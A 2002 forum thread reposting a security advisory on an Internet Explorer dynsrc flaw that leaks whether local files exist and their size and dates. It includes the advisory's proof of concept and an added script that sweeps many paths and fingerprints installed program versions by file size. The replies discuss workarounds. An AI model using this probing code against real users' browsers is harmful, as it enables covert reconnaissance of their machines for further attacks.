Vulnerability: MS IE Local Files Information Retrieval

  1. #1
    s0nIc (Fastest Thing Alive)
    Join Date: Sep 2001
    Location: Sydney
    Posts: 1,584

    Vulnerability: MS IE Local Files Information Retrieval

    Retrieving information on local files in IE
    Posted by: Dalibor Glavan


    The problem lies within the dynsrc property's implementation, which
    completely ignores the source validity and gives script access to the
    assigned file even if it is not presentable.


    Affected applications:
    ======================

    All tested versions of Microsoft Internet Explorer (IE5+); prior versions
    may be vulnerable as well.


    Introduction:
    =============

    The <img> element is commonly used to present images on an HTML document.
    However, it also contains a feature that allows it to present other types of
    media, such as VRML, AVI, MPEG, etc.

    This feature was implemented in the form of a property named dynsrc.


    Discussion:
    ===========

    The problem lies within the dynsrc property's implementation, which
    completely ignores the source validity and gives script access to the
    assigned file even if it is not presentable.

    Once a file name has been assigned to the dynsrc property it is possible to
    see whether it exists by checking the fileSize property of the <img>
    element: if the return value is -1 then it is certain that the file does not
    exist; any greater value indicates that the file exists.

    When a file is known to exist it is possible to extract additional
    information from the <img> element.

    Such as:

    * The file size in bytes, using the fileSize property.
    * The date the file was created, using the fileCreatedDate property.
    * The date the file was last modified, using the fileModifiedDate property.
    * The date the file was last updated, using the fileUpdatedDate property.

    A malicious attacker may use this bug in conjunction with other bugs to
    detect files or determine whether the user has specific programs (and even
    specific versions, according to size) installed, etc.


    Exploit:
    ========

    This simple example demonstrates how the bug is used to check whether
    "c:/test.txt" exists and retrieves its additional properties if it does.



    <img id="oFile" dynsrc="c:/test.txt">
    <script>
    // Wait briefly before reading the file properties; they are not
    // populated synchronously after dynsrc is assigned.
    setTimeout(
    function () {
    alert(
    oFile.fileSize>-1 ?
    "File exists!\n\n"+
    "Size: "+oFile.fileSize+" bytes.\n"+
    "Created: "+oFile.fileCreatedDate+".\n"+
    "Modified: "+oFile.fileModifiedDate+".\n"+
    "Updated: "+oFile.fileUpdatedDate+"."
    :
    "File does not exist."
    );
    },
    250
    );
    </script>



    Solution:
    =========

    Microsoft was first informed on 18 Feb 2002 (38 days ago); they have opened
    an investigation regarding this issue and will probably release a patch in
    the near future.

    Until a patch becomes available the only workaround is to disable Active
    Scripting.


    Tested on:
    ==========

    IE5sp2 NT4 sp6a, all possible patches.
    IE5.5sp2 Win98, all patches.
    IE5.5sp2 NT4 sp6a, all patches.
    IE6sp1 Win2000 sp2, all patches.


    Demonstration:
    ==============

    A fully dynamic proof-of-concept demonstration of this issue is available at
    http://security.greymagic.com/adv/gm003-ie/.


    Feedback:
    =========

    Please mail any questions or comments to security@greymagic.com.

    - Copyright © 2002 GreyMagic Software.


    Source: http://www.xatrix.org/modules.php?op...thread&order=1
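The advisory's proof-of-concept checks one hard-coded file. The following is an added example (not code from the GreyMagic advisory or from the forum post) that generalises it into a sweep over several candidate paths, applies the advisory's rule (fileSize of -1 means absent, anything above -1 means present) and matches the reported size against a fingerprint table, which is the "specific programs and versions" use the advisory warns about. Only the dynsrcProbe function depends on the affected IE versions; the interpretation and sweep logic is plain JavaScript, so it is exercised here against a constructed fake file list. Every path, size and product label in the block is a hypothetical placeholder, not a real program file or its real size.

```javascript
// Added example, not code from the GreyMagic advisory or the forum post.
// Generalises the single-file dynsrc check into a path sweep with size
// fingerprinting. Paths, sizes and labels are hypothetical placeholders.

// Interpret one probed element the way the advisory describes:
// fileSize -1 (or unreadable) = file absent, anything above -1 = present.
function interpretProbe(path, img) {
  var size = Number(img.fileSize);
  if (isNaN(size) || size < 0) {
    return { path: path, exists: false };
  }
  return {
    path: path,
    exists: true,
    size: size,
    created: img.fileCreatedDate,
    modified: img.fileModifiedDate,
    updated: img.fileUpdatedDate
  };
}

// IE5/6-only probe: point a hidden <img> at the local path via dynsrc and
// read its file properties after a short delay, since they are not
// populated synchronously (the advisory's PoC waits 250 ms for this reason).
function dynsrcProbe(path, cb, delayMs) {
  var img = document.createElement("img");
  img.style.display = "none";
  img.dynsrc = path;
  document.body.appendChild(img);
  setTimeout(function () {
    var info = interpretProbe(path, img);
    document.body.removeChild(img);
    cb(info);
  }, delayMs || 250);
}

// Probe the paths one after another; probe(path, cb) must call cb(info) once.
// Sequential so a slow property read is never attributed to the wrong element.
function probePaths(paths, probe, done) {
  var results = [];
  (function next(i) {
    if (i >= paths.length) {
      done(results);
      return;
    }
    probe(paths[i], function (info) {
      results.push(info);
      next(i + 1);
    });
  })(0);
}

// Hypothetical size -> version table keyed by path. Real fingerprinting would
// use measured sizes of the binaries of interest.
var FINGERPRINTS = {
  "c:/program files/example/app.exe": {
    1048576: "Example App 1.0 (hypothetical)",
    1310720: "Example App 2.0 (hypothetical)"
  }
};

// Turn existing files whose size is in the table into version labels.
function fingerprint(results, table) {
  var hits = [];
  for (var i = 0; i < results.length; i++) {
    var r = results[i];
    var known = r.exists ? table[r.path] : null;
    if (known && known[r.size]) {
      hits.push({ path: r.path, label: known[r.size] });
    }
  }
  return hits;
}

// Constructed stand-in for the victim's disk so the sweep runs outside IE.
var FAKE_FS = {
  "c:/test.txt": {
    fileSize: 12,
    fileCreatedDate: "01/01/2002",
    fileModifiedDate: "02/01/2002",
    fileUpdatedDate: "02/01/2002"
  },
  "c:/program files/example/app.exe": { fileSize: 1310720 }
};

function fakeProbe(path, cb) {
  cb(interpretProbe(path, FAKE_FS[path] || { fileSize: -1 }));
}

// fakeProbe calls back immediately, so the report is complete as soon as
// probePaths returns. In IE the same sweep runs with dynsrcProbe instead.
function sweepWithFakeProbe(paths) {
  var out = null;
  probePaths(paths, fakeProbe, function (results) {
    out = { results: results, hits: fingerprint(results, FINGERPRINTS) };
  });
  return out;
}

if (typeof document === "undefined") {
  console.log(sweepWithFakeProbe([
    "c:/test.txt", "c:/missing.txt", "c:/program files/example/app.exe"
  ]));
}
```

In a browser the sweep would be started with probePaths(paths, dynsrcProbe, reportFn); the fake probe exists only so the interpretation and fingerprinting code can be run and checked anywhere.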

  2. #2
    Senior Member
    Join Date: Nov 2001
    Posts: 4,786
    Every security-minded person should already have Active Scripting disabled. It's just too bad that it comes enabled by default.

  3. #3
    Senior Member
    Join Date: Feb 2002
    Posts: 177
    So this is not fixed in MS's brand new IE patch? I just checked MS's site, and the IE patch said nothing about fixing a problem with what you're talking about, Sonic. Maybe I missed something, though.

  4. #4
    Senior Member
    Join Date: Aug 2001
    Posts: 100
    This is Microsoft's way of handling things:
    "Don't say anything about security holes in your system until you can't deny it any longer."

    That's not the "best" way of working with your clients, but it's Microsoft's way, and if you had some million $ you would do it the same way ...

    ------------------------------------------------------------------------------------------------------------------------
    "Knowledge is the real power"
